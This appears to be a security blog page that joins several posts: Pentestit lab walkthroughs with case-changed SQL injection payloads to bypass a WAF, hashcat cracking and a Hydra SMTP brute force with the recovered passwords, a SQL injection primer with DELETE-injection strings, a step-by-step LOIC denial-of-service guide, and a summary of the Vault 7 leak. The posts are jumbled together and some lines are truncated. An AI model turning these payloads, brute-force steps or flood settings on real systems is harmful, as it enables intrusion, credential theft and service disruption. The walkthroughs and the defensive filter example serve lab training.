                         _    _   _ ____     ____  ____   ___  ____  ____  _____ ____  
                        / \  | \ | |  _ \   |  _ \|  _ \ / _ \/ ___||  _ \| ____|  _ \ 
                       / _ \ |  \| | | | |  | |_) | |_) | | | \___ \| |_) |  _| | |_) |
                      / ___ \| |\  | |_| |  |  __/|  _ <| |_| |___) |  __/| |___|  _ < 
                     /_/   \_\_| \_|____/   |_|   |_| \_\\___/|____/|_|   |_____|_| \_\

Full version of the Ransom Note:

Full Ransom Note

Pentestit Lab v10 – The Site Token

In my previous post “Pentestit Lab v10 – The Mail Token”, we attained usernames through Intelligence Gathering, brute-forced the SMTP Service, attained login credentials, and scored our first token. Today we will take our first steps at compromising the Global Data Security website, which will include the following:

  • Mapping the Attack Surface & Defenses
  • Exploiting SQL Injection w/ WAF Bypass
  • Cracking SQL Hashes
  • Finding the Site Token

If you are reading this post for the first time, and have no clue on what’s going on – then I suggest you start from the beginning and read “Pentestit Lab v10 – Introduction & Setup”.

I also included a ton of resources in my second post that I linked above – you should seriously check that out if you already haven’t!

Mapping the Attack Surface & Defenses:

Whenever we attempt to attack a web application, we have to start by mapping out the web app and its associated structure. That means finding directories, hidden links, files, URL queries, etc.

Once we have mapped our application, we can start looking for vulnerabilities such as SQL Injection, XSS, Path Traversal, etc.

For the Global Data Security website (which I will call GDS from now on), I considered the Security Blog a good starting point.

After going through all the links on the website, I noticed a particular URL parameter in the blog posts that caught my eye.

Notice the id parameter being passed into the URL after post.php? We can actually test this parameter for SQL Injection!

Exploiting SQL Injection w/ WAF Bypass:

I began trying to exploit the id parameter, but for some reason every time I injected some SQL code, I was taken back to the home page.

This made me consider that there might be a WAF (Web Application Firewall) in place, preventing me from exploiting this SQL Injection.

I decided to attempt a Case Change Bypass to see if I could somehow bypass the filter, since some WAFs only filter lowercase SQL keywords.

I began by injecting the following into the URL:,2%23

After submitting the query, you can see that the SQL Injection is in fact there, and that the Case Change allowed me to bypass the WAF filter.

Now that we got the SQL Injection to work, let’s start by pulling all the tables in the database with the following:,GroUp_ConCaT%28taBlE_SCheMa,0x20a,TAblE_NaME%29+FrOm+iNfOrmaTioN_scHeMa.TabLeS+WHerE+tAblE_SchEma=DaTabAsE%28%29%23

Nice! Now that we got our table names, let’s pull all the columns from the “site” table.,GroUp_ConCaT%28TAblE_NaME,0x20,CoLumN_NaME%29+FrOm+iNfOrmaTioN_scHeMa.ColUmNs+WHerE+tAblE_SchEma=%27site%27%23

We see that the users table has a username and password column, so let’s go ahead and dump any data in those columns.,GroUp_ConCaT%28useRnAMe,0x20,paSswOrD%29+FrOm+site.users%23
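From the defender's side, as an added example that is neither the lab's WAF nor code from this post: the lowercase-only keyword rule the post describes, beside a normalising rule that URL-decodes and case-folds the query string before matching and requires more than one SQL keyword, so that an ordinary word like "from" in a search box is not a false positive. The request strings are constructed to mirror the mixed-case pattern shown above.

```python
import re
from urllib.parse import unquote_plus

# Keywords the mixed-case payloads above rely on.
SQL_KEYWORDS = ("union", "select", "group_concat", "from", "where", "information_schema")
KEYWORD_RE = re.compile(r"\b(" + "|".join(map(re.escape, SQL_KEYWORDS)) + r")\b")


def naive_filter(query_string):
    """The weak rule the post describes: a substring match on lowercase keywords
    against the raw, still URL-encoded query string. Case changes slip past it."""
    return any(kw in query_string for kw in SQL_KEYWORDS)


def normalise(query_string):
    """Decode URL encoding ('+' and %XX), collapse whitespace and fold case, so that
    GroUp_ConCaT, FrOm, iNfOrmaTioN_scHeMa and friends all compare as one spelling."""
    decoded = unquote_plus(query_string)
    return re.sub(r"\s+", " ", decoded).lower()


def hardened_filter(query_string, min_keywords=2):
    """Flag a request when at least `min_keywords` distinct SQL keywords occur after
    normalisation; a lone 'from' or 'where' in ordinary text is not enough."""
    found = set(KEYWORD_RE.findall(normalise(query_string)))
    return len(found) >= min_keywords


# Constructed query strings modelled on the pattern in the post (not captured requests).
REQUESTS = {
    "legit": "id=2",
    "lowercase": "id=-1+union+select+1,2%23",
    "case_changed": "id=-1+UnIoN+SeLeCt+1,GroUp_ConCaT%28taBlE_SCheMa,0x20a,TAblE_NaME%29"
                    "+FrOm+iNfOrmaTioN_scHeMa.TabLeS+WHerE+tAblE_SchEma=DaTabAsE%28%29%23",
    "benign_word": "q=letters+from+home",
}


def evaluate(filter_fn):
    """Run a filter over every sample and return {name: blocked?}."""
    return {name: filter_fn(q) for name, q in REQUESTS.items()}


if __name__ == "__main__":
    print("naive   :", evaluate(naive_filter))      # misses case_changed, flags benign_word
    print("hardened:", evaluate(hardened_filter))   # catches case_changed, passes benign_word
```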

Cracking MySQL Hashes:

Awesome, we got another username, and a SQL Hash of the associated user’s password. Let’s first start by saving the username for future reference, along with the other usernames we have.

root@kali:~/gds# nano names
root@kali:~/gds# cat names 

Since we got a SQL Hash, let’s use hash-identifier to see what type of hash it is. Then, we can use HashCat to try and crack it!

root@kali:~/gds# nano lindsey_hash
root@kali:~/gds# cat lindsey_hash 

root@kali:~/gds# hash-identifier
   #	 __  __ 		    __		 ______    _____	   #
   #	/\ \/\ \		   /\ \ 	/\__  _\  /\  _ `\	   #
   #	\ \ \_\ \     __      ____ \ \ \___	\/_/\ \/  \ \ \/\ \	   #
   #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
   #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
   #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
   #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #								 By Zion3R #
   #							www.Blackploit.com #
   #						       Root@Blackploit.com #

 HASH: $1$w9aURG9k$Wf1VIpv9VET3v3VWZ4YD8. 

Possible Hashs:
[+]  MD5(Unix)


root@pentestit:~# hashcat -m 500 -a 0 lindsey_hash /usr/share/wordlists/rockyou.txt
Initializing hashcat v2.00 with 2 threads and 32mb segment-size...

Skipping line: cat lindsey_hash (signature unmatched)
Added hashes from file lindsey_hash: 1 (1 salts)
Activating quick-digest mode for single-hash with salt

[s]tatus [p]ause [r]esume [b]ypass [q]uit => r
All hashes have been recovered

Input.Mode: Dict (/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3605274 (words), 33550339 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 20.45k words
Progress..: 166528/3605274 (4.62%)
Running...: 00:00:00:09
Estimated.: 00:00:02:48

Started: Mon Mar 20 07:46:37 2017
Stopped: Mon Mar 20 07:46:46 2017

After some time we see that the MD5 Hash is that of the password lindsey123.

Finding the Site Token:

Since we were able to compromise a username and password, we need to find a place where we can leverage these credentials.

At this point, I decide to run dirb to try and enumerate any interesting directories that I might have missed.

root@pentestit:~# dirb

DIRB v2.22 
By The Dark Raver

START_TIME: Mon Mar 20 07:50:58 2017
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt



---- Scanning URL: ----
+ (CODE:200|SIZE:7343) 
---- Entering directory: ----
+ (CODE:302|SIZE:0) 
---- Entering directory: ----
---- Entering directory: ----
---- Entering directory: ----

---- Entering directory: ----

---- Entering directory: ----
---- Entering directory: ----
END_TIME: Mon Mar 20 08:00:01 2017

The admin console looks promising! So let’s go ahead and log in there!


Once logged in, you should automatically see the Site Token on the main page.

Token (2/13):

We found the token! Go ahead and submit it on the main page to gain points for it!

I didn’t post the actual token. Because, what would be the fun in that if I did? Go through and actually try to compromise the Blog to get the token!


You learn by practical work, so go through this walkthrough, and the lab – and learn something new!

That’s all for now, stay tuned for the next post to compromise the next Token (3/13) – The SSH Token!

All that is SQL Injection

Introducing SQL Injection

SQL injection has been around for at least 20 years, but it is no less powerful or dangerous than any other attack we have covered so far. It is designed to exploit flaws in a website or web application. The attack works by inserting code into an existing line of code prior to its being executed by a database. If SQL injection is successful, attackers can cause their own code to run. In the real world this attack has proven dangerous because many developers are either not aware of the threat or don’t understand its seriousness. Developers should be aware that:

  • SQL injection is typically a result of flaws in the web application or website and is not an issue with the database.
  • SQL injection is at the source of many of the high-level or well-known attacks on the Internet.
  • The goal of attacks of this type is to submit commands through a web application to a database in order to retrieve or manipulate data.
  • The usual cause of this type of flaw is improper or absent input validation, thus allowing code to pass unimpeded to the database without being verified.


SQL Attacks in Action

In 2011, Sony Corporation was the victim of a SQL injection that compromised a multitude of accounts (estimated to be over one million e-mails, usernames, and passwords). The FBI revealed that a minimum of 100,000 records, including Social Security numbers of current and former federal employees, were compromised. Additionally, 2,800 of the records obtained included bank account numbers. When investigating this attack, the FBI revealed that not only the DoE and the Army were impacted; NASA, the U.S. Missile Defense Agency, and the Environmental Protection Agency were also affected. Details of these attacks have not been fully released as of this writing. SQL injection is achieved through the insertion of characters into existing SQL commands with the intention of altering the intended behavior. The following example illustrates SQL injection in action and how it is carried out. The example also reveals the impact of altering the existing values and structure of a SQL query.

In the following example, an attacker with the username link enters the string ‘name’; DELETE FROM items; -- as the value for itemName (the text after the = sign in the WHERE clause), so that it is spliced into the existing SQL command, and the single query becomes the following two queries:

SELECT * FROM items 
WHERE owner = 'link' 
AND itemname = 'name'; 
DELETE FROM items;--

Many of the common database products such as Microsoft’s SQL Server and Oracle’s Siebel allow several SQL statements separated by semicolons to be executed at once. This technique, known as batch execution, allows an attacker to execute multiple arbitrary commands against a database. In other databases, this technique will generate an error and fail, so knowing the database you are attacking is essential.

If an attacker instead enters the string 'name'; DELETE FROM items; SELECT * FROM items WHERE 'a' = 'a', the following three valid statements will be created:

SELECT * FROM items 
WHERE owner = 'link' 
AND itemname = 'name'; 
DELETE FROM items;
SELECT * FROM items WHERE 'a' = 'a';

A good way to prevent SQL injection attacks is to use input validation, which ensures that only approved characters are accepted. Use whitelists, which dictate safe characters, and blacklists, which dictate unsafe characters.

Results of SQL Injection

What can be accomplished as a result of a SQL injection attack? Well, there are a huge number of possibilities, which are limited only by the configuration of the system and the skill of the attacker.

If an attack is successful, a host of problems could result. Consider the following a sample of the potential outcomes:

  • Identity spoofing through manipulating databases to insert bogus or misleading information such as e-mails and contact information.
  • Alteration of prices in e-commerce applications. In this attack, the intruder once again alters data, but does so with the intention of changing price information in order to purchase products or services at a reduced rate.
  • Alteration of data or outright replacement of data in existing databases with information created by the attacker.
  • Escalation of privileges to increase the level of access an attacker has to the system, up to and including full administrative access to the operating system.
  • Denial of service, performed by flooding the server with requests designed to overwhelm the system.
  • Data extraction and disclosure of all data on the system through the manipulation of the database.
  • Destruction or corruption of data through rewriting, altering, or other means.
  • Eliminating or altering transactions that have been or will be committed.


Next up will be all about the anatomy of a SQL Injection and Database vulnerabilities.

LOIC (Low Orbit Ion Cannon) – DOS attacking tool

Low Orbit Ion Cannon (LOIC) is one of the easiest DDoS tools available, yet its simplicity and remote connection features make it an extremely effective tool. In this guide I will show you just how easy it is to launch a DoS attack using LOIC. For this exercise I used a Windows Server 2008 client with LOIC installed and a Windows 7 target with Wireshark for traffic capture.

1. First, we run the LOIC.exe file. Do not perform an in-depth installation; just run the executable.

2. Once you run the EXE, the program pops up and is ready for a quick configuration. Note that you can target a URL as well as a specific IP address. For our purposes just enter the IP of your Windows 7 box.

Low Orbit Ion Cannon

3. Click the Lock On button. The IP address shows up as the target; there is no doubt where this traffic is going.

LOIC - Low Orbit Ion Cannon setup

4. Now that you have the IP input and target selected, you can configure a few more details for your attack preferences. For this exercise use port 80, the TCP method, 10000 threads, and the default TCP/UDP message, as shown here:

5. Before you hit the fire button, hop back over to your Windows 7 system and start Wireshark to see the traffic generated by LOIC.

6. Now you can fire your LOIC beam and view the traffic.

LOIC - traffic

Vault 7: CIA Hacking Tools – Analysis

CIA malware targets iPhone, Android, smart TVs

CIA malware and hacking tools are built by EDG (Engineering Development Group), a software development group within CCI (Center for Cyber Intelligence), a department belonging to the CIA’s DDI (Directorate for Digital Innovation). The DDI is one of the five major directorates of the CIA (see this organizational chart of the CIA for more details).

The EDG is responsible for the development, testing and operational support of all backdoors, exploits, malicious payloads, trojans, viruses and any other kind of malware used by the CIA in its covert operations world-wide.

The increasing sophistication of surveillance techniques has drawn comparisons with George Orwell’s 1984, but “Weeping Angel”, developed by the CIA’s Embedded Devices Branch (EDB), which infests smart TVs, transforming them into covert microphones, is surely its most emblematic realization.

The attack against Samsung smart TVs was developed in cooperation with the United Kingdom’s MI5/BTSS. After infestation, Weeping Angel places the target TV in a ‘Fake-Off’ mode, so that the owner falsely believes the TV is off when it is on. In ‘Fake-Off’ mode the TV operates as a bug, recording conversations in the room and sending them over the Internet to a covert CIA server.

As of October 2014 the CIA was also looking at infecting the vehicle control systems used by modern cars and trucks. The purpose of such control is not specified, but it would permit the CIA to engage in nearly undetectable assassinations.

The CIA’s Mobile Devices Branch (MDB) developed numerous attacks to remotely hack and control popular smart phones. Infected phones can be instructed to send the CIA the user’s geolocation, audio and text communications as well as covertly activate the phone’s camera and microphone.

Despite iPhone’s minority share (14.5%) of the global smart phone market in 2016, a specialized unit in the CIA’s Mobile Development Branch produces malware to infest, control and exfiltrate data from iPhones and other Apple products running iOS, such as iPads. CIA’s arsenal includes numerous local and remote “zero days” developed by CIA or obtained from GCHQ, NSA, FBI or purchased from cyber arms contractors such as Baitshop. The disproportionate focus on iOS may be explained by the popularity of the iPhone among social, political, diplomatic and business elites.

A similar unit targets Google’s Android which is used to run the majority of the world’s smart phones (~85%) including Samsung, HTC and Sony. 1.15 billion Android powered phones were sold last year. “Year Zero” shows that as of 2016 the CIA had 24 “weaponized” Android “zero days” which it has developed itself and obtained from GCHQ, NSA and cyber arms contractors.

These techniques permit the CIA to bypass the encryption of WhatsApp, Signal, Telegram, Wiebo, Confide and Cloackman by hacking the “smart” phones that they run on and collecting audio and message traffic before encryption is applied.


CIA malware targets Windows, OSx, Linux, routers

The CIA also runs a very substantial effort to infect and control Microsoft Windows users with its malware. This includes multiple local and remote weaponized “zero days”, air gap jumping viruses such as “Hammer Drill” which infects software distributed on CD/DVDs, infectors for removable media such as USBs, systems to hide data in images or in covert disk areas ( “Brutal Kangaroo”) and to keep its malware infestations going.

Many of these infection efforts are pulled together by the CIA’s Automated Implant Branch (AIB), which has developed several attack systems for automated infestation and control of CIA malware, such as “Assassin” and “Medusa”.

Attacks against Internet infrastructure and webservers are developed by the CIA’s Network Devices Branch (NDB).

The CIA has developed automated multi-platform malware attack and control systems covering Windows, Mac OS X, Solaris, Linux and more, such as EDB’s “HIVE” and the related “Cutthroat” and “Swindle” tools, which are described in the examples section below.


CIA ‘hoarded’ vulnerabilities (“zero days”)

In the wake of Edward Snowden’s leaks about the NSA, the U.S. technology industry secured a commitment from the Obama administration that the executive would disclose on an ongoing basis — rather than hoard — serious vulnerabilities, exploits, bugs or “zero days” to Apple, Google, Microsoft, and other US-based manufacturers.

Serious vulnerabilities not disclosed to the manufacturers place huge swathes of the population and critical infrastructure at risk from foreign intelligence or cyber criminals who independently discover or hear rumors of the vulnerability. If the CIA can discover such vulnerabilities, so can others.

The U.S. government’s commitment to the Vulnerabilities Equities Process came after significant lobbying by US technology companies, who risk losing their share of the global market over real and perceived hidden vulnerabilities. The government stated that it would disclose all pervasive vulnerabilities discovered after 2010 on an ongoing basis.

“Year Zero” documents show that the CIA breached the Obama administration’s commitments. Many of the vulnerabilities used in the CIA’s cyber arsenal are pervasive and some may already have been found by rival intelligence agencies or cyber criminals.

As an example, specific CIA malware revealed in “Year Zero” is able to penetrate, infest and control both the Android phone and iPhone software that runs or has run presidential Twitter accounts. The CIA attacks this software by using undisclosed security vulnerabilities (“zero days”) possessed by the CIA but if the CIA can hack these phones then so can everyone else who has obtained or discovered the vulnerability. As long as the CIA keeps these vulnerabilities concealed from Apple and Google (who make the phones) they will not be fixed, and the phones will remain hackable.

The same vulnerabilities exist for the population at large, including the U.S. Cabinet, Congress, top CEOs, system administrators, security officers and engineers. By hiding these security flaws from manufacturers like Apple and Google the CIA ensures that it can hack everyone — at the expense of leaving everyone hackable.


‘Cyberwar’ programs are a serious proliferation risk

Cyber ‘weapons’ are not possible to keep under effective control.

While nuclear proliferation has been restrained by the enormous costs and visible infrastructure involved in assembling enough fissile material to produce a critical nuclear mass, cyber ‘weapons’, once developed, are very hard to retain.

Cyber ‘weapons’ are in fact just computer programs which can be pirated like any other. Since they are entirely comprised of information they can be copied quickly with no marginal cost.

Securing such ‘weapons’ is particularly difficult since the same people who develop and use them have the skills to exfiltrate copies without leaving traces — sometimes by using the very same ‘weapons’ against the organizations that contain them. There are substantial price incentives for government hackers and consultants to obtain copies since there is a global “vulnerability market” that will pay hundreds of thousands to millions of dollars for copies of such ‘weapons’. Similarly, contractors and companies who obtain such ‘weapons’ sometimes use them for their own purposes, obtaining advantage over their competitors in selling ‘hacking’ services.

Over the last three years the United States intelligence sector, which consists of government agencies such as the CIA and NSA and their contractors, such as Booz Allen Hamilton, has been subject to an unprecedented series of data exfiltrations by its own workers.

A number of intelligence community members not yet publicly named have been arrested or subject to federal criminal investigations in separate incidents.

Most visibly, on February 8, 2017 a U.S. federal grand jury indicted Harold T. Martin III with 20 counts of mishandling classified information. The Department of Justice alleged that it seized some 50,000 gigabytes of information from Harold T. Martin III that he had obtained from classified programs at NSA and CIA, including the source code for numerous hacking tools.

Once a single cyber ‘weapon’ is ‘loose’ it can spread around the world in seconds, to be used by peer states, cyber mafia and teenage hackers alike.


U.S. Consulate in Frankfurt is a covert CIA hacker base

In addition to its operations in Langley, Virginia the CIA also uses the U.S. consulate in Frankfurt as a covert base for its hackers covering Europe, the Middle East and Africa.

CIA hackers operating out of the Frankfurt consulate ( “Center for Cyber Intelligence Europe” or CCIE) are given diplomatic (“black”) passports and State Department cover. The instructions for incoming CIA hackers make Germany’s counter-intelligence efforts appear inconsequential: “Breeze through German Customs because you have your cover-for-action story down pat, and all they did was stamp your passport”

Your Cover Story (for this trip)
Q: Why are you here?
A: Supporting technical consultations at the Consulate.

Two earlier WikiLeaks publications give further detail on CIA approaches to customs and secondary screening procedures.

Once in Frankfurt CIA hackers can travel without further border checks to the 25 European countries that are part of the Schengen open border area — including France, Italy and Switzerland.

A number of the CIA’s electronic attack methods are designed for physical proximity. These attack methods are able to penetrate high security networks that are disconnected from the internet, such as police record databases. In these cases, a CIA officer, agent or allied intelligence officer acting under instructions, physically infiltrates the targeted workplace. The attacker is provided with a USB containing malware developed for the CIA for this purpose, which is inserted into the targeted computer. The attacker then infects and exfiltrates data to removable media. For example, the CIA attack system Fine Dining provides 24 decoy applications for CIA spies to use. To witnesses, the spy appears to be running a program showing videos (e.g. VLC), presenting slides (Prezi), playing a computer game (Breakout2, 2048) or even running a fake virus scanner (Kaspersky, McAfee, Sophos). But while the decoy application is on the screen, the underlying system is automatically infected and ransacked.


How the CIA dramatically increased proliferation risks

In what is surely one of the most astounding intelligence own goals in living memory, the CIA structured its classification regime such that for the most market valuable part of “Vault 7” — the CIA’s weaponized malware (implants + zero days), Listening Posts (LP), and Command and Control (C2) systems — the agency has little legal recourse.

The CIA made these systems unclassified.

Why the CIA chose to make its cyberarsenal unclassified reveals how concepts developed for military use do not easily cross over to the ‘battlefield’ of cyber ‘war’.

To attack its targets, the CIA usually requires that its implants communicate with their control programs over the internet. If CIA implants, Command & Control and Listening Post software were classified, then CIA officers could be prosecuted or dismissed for violating rules that prohibit placing classified information onto the Internet. Consequently the CIA has secretly made most of its cyber spying/war code unclassified. The U.S. government is not able to assert copyright either, due to restrictions in the U.S. Constitution. This means that cyber ‘arms’ manufacturers and computer hackers can freely “pirate” these ‘weapons’ if they are obtained. The CIA has primarily had to rely on obfuscation to protect its malware secrets.

Conventional weapons such as missiles may be fired at the enemy (i.e into an unsecured area). Proximity to or impact with the target detonates the ordnance including its classified parts. Hence military personnel do not violate classification rules by firing ordnance with classified parts. Ordnance will likely explode. If it does not, that is not the operator’s intent.

Over the last decade U.S. hacking operations have been increasingly dressed up in military jargon to tap into Department of Defense funding streams. For instance, attempted “malware injections” (commercial jargon) or “implant drops” (NSA jargon) are being called “fires” as if a weapon was being fired. However the analogy is questionable.

Unlike bullets, bombs or missiles, most CIA malware is designed to live for days or even years after it has reached its ‘target’. CIA malware does not “explode on impact” but rather permanently infests its target. In order to infect a target’s device, copies of the malware must be placed on the target’s devices, giving physical possession of the malware to the target. To exfiltrate data back to the CIA or to await further instructions the malware must communicate with CIA Command & Control (C2) systems placed on internet connected servers. But such servers are typically not approved to hold classified information, so CIA command and control systems are also made unclassified.

A successful ‘attack’ on a target’s computer system is more like a series of complex stock maneuvers in a hostile take-over bid or the careful planting of rumors in order to gain control over an organization’s leadership rather than the firing of a weapons system. If there is a military analogy to be made, the infestation of a target is perhaps akin to the execution of a whole series of military maneuvers against the target’s territory including observation, infiltration, occupation and exploitation.


Evading forensics and anti-virus

A series of standards lay out CIA malware infestation patterns which are likely to assist forensic crime scene investigators as well as Apple, Microsoft, Google, Samsung, Nokia, Blackberry, Siemens and anti-virus companies attribute and defend against attacks.

“Tradecraft DO’s and DON’Ts” contains CIA rules on how its malware should be written to avoid fingerprints implicating the “CIA, US government, or its witting partner companies” in “forensic review”. Similar secret standards cover the use of encryption to hide CIA hacker and malware communication (pdf), describing targets & exfiltrated data (pdf) as well as executing payloads (pdf) and persisting (pdf) in the target’s machines over time.

CIA hackers developed successful attacks against most well known anti-virus programs. These are documented in AV defeats, Personal Security Products, Detecting and defeating PSPs and PSP/Debugger/RE Avoidance. For example, Comodo was defeated by CIA malware placing itself in the Windows “Recycle Bin”, while Comodo 6.x has a “Gaping Hole of DOOM”.

CIA hackers discussed what the NSA’s “Equation Group” hackers did wrong and how the CIA’s malware makers could avoid similar exposure.


Pentestit Lab v10 – The Mail Token

In my previous post “Pentestit Lab v10 – Introduction & Layout”, I covered the Network layout and VPN Connection. Today I will be covering the first steps taken to attack the lab – which will include the following:

  • Fingerprinting the GW machine
  • Carrying out Intelligence Gathering
  • Brute Forcing SMTP
  • Finding the Mail Token

There are 13 Tokens in total scattered throughout the lab (Network). Each of the posts is in the order of compromise which provided the best results and was the most logical. I closely followed the Penetration Testing Execution Standard, which aided me in compromising the next system or device from previously gained information.

What does this mean? This means that I started by enumerating users, gaining emails, passwords, and any other network information that seemed useful to me. With this information I was able to log into other devices, leverage exploits or logins further in the process, this also allowed me to easily pivot from machine to machine and gain deeper access to the network – to where I was finally able to take control of the Domain Controller.

If you are completely unfamiliar with how a “Grey Box” Penetration Test is carried out on a Network – along with the exploitation of Web Applications, daemons and services – then I highly suggest you get ahold of and read the following resources – as well as read the PTES Standards that I linked above.

As with anything, if you have any comments, questions, or general concerns/issues/suggestions about my techniques – please leave a comment below!

Fingerprinting the GW Machine:

Consult the Network Map if you forgot what or where the GW Machine is. Since it’s the only Server sitting between us (possibly in the DMZ) and the internal network, we have to compromise it first to gain access to the internal network.

Since we already have VPN access to the lab – we can start by fingerprinting the gw machine (also called Active Footprinting in the PTES).

We can do so by running Nmap as a SYN Stealth Scan with the -sS option, as well as running the -A option for OS detection, version detection, script scanning, and traceroute. I also used the -n option to disable DNS Resolution.

If you are unfamiliar with the Nmap scan options, or need a quick refresher – then I suggest you read the Nmap Options Summary.

eb7u6 (protocol 2.0)
| ssh-hostkey: 
|   1024 bd:04:9b:d8:8d:0e:5b:e3:11:a7:57:18:c0:ce:9f:83 (DSA)
|   2048 98:e6:d0:35:6d:11:c4:d1:fb:7c:0f:87:c6:b6:8e:da (RSA)
|_  256 2c:58:fd:06:ea:46:8e:f7:b5:28:58:58:06:fa:dc:38 (ECDSA)
25/tcp   open  smtp    CommuniGate Pro mail server 6.0.9
|_smtp-commands: SMTP EHLO nmap.scanme.org: failed to receive data: connection timeout
80/tcp   open  http    nginx 1.10.1
|_http-server-header: nginx/1.10.1
|_http-title: 403 Forbidden
443/tcp  open  http    nginx 1.2.1
|_http-server-header: nginx/1.2.1
|_http-title: Security Blog by GlobalDataSecurity
8100/tcp open  http    CommuniGate Pro httpd 6.0.9
| http-methods: 
|_http-server-header: CommuniGatePro/6.0.9
|_http-svn-info: ERROR: Script execution failed (use -d to debug)
|_http-title:  CommuniGate Pro gds.lab Entrance
| http-webdav-scan: 
|   Server Type: CommuniGatePro/6.0.9
|   Server Date: Tue, 24 Jan 2017 23:31:59 GMT
|   WebDAV type: Unkown
|   Directory Listing: 
|     /
|     /CalDAV/
|     /CalDAV/INBOX/
|     /CalDAV/Outbox/
|     /WebDAV/private/caldav/
|_    /CalDAV/Notify/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|firewall|broadband router|media device
Running (JUST GUESSING): Linux 3.X|2.6.X (91%), WatchGuard Fireware 11.X (91%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3.x
Aggressive OS guesses: Linux 3.2 - 3.8 (91%), Linux 3.8 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Linux 3.2.0 (90%), Linux 3.0 - 3.2 (88%), Linux 3.5 (88%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%), Linux 2.6.39 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops
Service Info: Host: gds.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 25/tcp)
1   117.65 ms
2   117.82 ms
3   118.93 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.62 seconds

Our initial review of the Nmap scans reveals that the following ports are open:

  • TCP/22 – SSH
  • TCP/25 – SMTP (CommuniGate Pro)
  • TCP/80 – nginx (HTTP)
  • TCP/443 – nginx (HTTPS)
  • TCP/8100 – CommuniGate Pro (HTTPD) – Email Server

In a logical fashion, we can’t attack SSH since we don’t have any credentials. We could use SMTP to enumerate users… but that could be tedious if we don’t know how login names are structured. I can try accessing CommuniGate Pro with an exploit… but version 6.0.9 at the time of writing this was exploit free.

The best bet – and most logical step – would be to explore TCP/80 and TCP/443 and see what the website holds for us. Maybe there are vulnerabilities, comments in the source code, account details, etc.

Intelligence Gathering:

Before I can continue to the website – just a quick tip – add the following to your /etc/hosts file so you don’t encounter any issues when accessing the website.

root@kali:~# nano /etc/hosts       localhost       kali   store.gds.lab

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Once having added store.gds.lab to the hosts file, navigate to the IP of and check out the website.

It seems that the website is that of a Global Data Security company selling Security Software… uhmmmm this is going to be fun!

Quickly digging through the website and its associated links really didn’t provide me with anything valuable. So I decided to move on and try TCP/443.

This is rather interesting! By the looks of it, I think I stumbled on the Blog of Global Data Security. Maybe we can find some account details such as usernames perhaps?

A quick look at the source code for the main page revealed the following:

<!DOCTYPE html>
<html lang="en">


    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="">
    <meta name="author" content="">

    <title>Security Blog by GlobalDataSecurity</title>

    <!-- Bootstrap Core CSS -->
    <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">

    <!-- Theme CSS -->
    <!-- Alfred Modlin said use this template -->
    <link href="css/clean-blog.min.css" rel="stylesheet">

    <!-- Custom Fonts -->
    <link href="vendor/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
    <link href='https://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
    <link href='https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800' rel='stylesheet' type='text/css'>

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>


Notice the comment? <!-- Alfred Modlin said use this template --> It seems like we got a possible username. Let’s save this for later in case we need it.

I notice that there is a “Contact Us” section on the blog as well, let’s go dig around there!

Well, well what do we have here? Emails! This is great! We now know how the usernames are structured for Global Data Security. So Alfred Modlin should be


Let’s add those usernames to a list for safe keeping.

root@kali:~# nano names
root@kali:~# cat names 

Brute Forcing SMTP:

Since we got those three usernames, and there’s an active E-Mail server on the site – let’s try and Brute Force some passwords through SMTP!

I decided to use THC Hydra for this, together with the rockyou password list.

root@kali:~# hydra -L names -P /usr/share/wordlists/rockyou.txt smtp
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-03-17 17:47:43
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 64 tasks, 43033197 login tries (l:3/p:14344399), ~42024 tries per task
[DATA] attacking service smtp on port 25
[STATUS] 221.00 tries/min, 221 tries in 00:01h, 43032976 to do in 3245:20h, 16 active
[STATUS] 215.67 tries/min, 647 tries in 00:03h, 43032550 to do in 3325:33h, 16 active
[STATUS] 215.57 tries/min, 1509 tries in 00:07h, 43031688 to do in 3326:57h, 16 active
[STATUS] 191.07 tries/min, 2866 tries in 00:15h, 43030460 to do in 3753:32h, 16 active
[25][smtp] host:   login: a.modlin@gds.lab   password: justdoit

Nice! We got a password for a.modlin! And since we got that… let’s snoop around his emails, shall we?
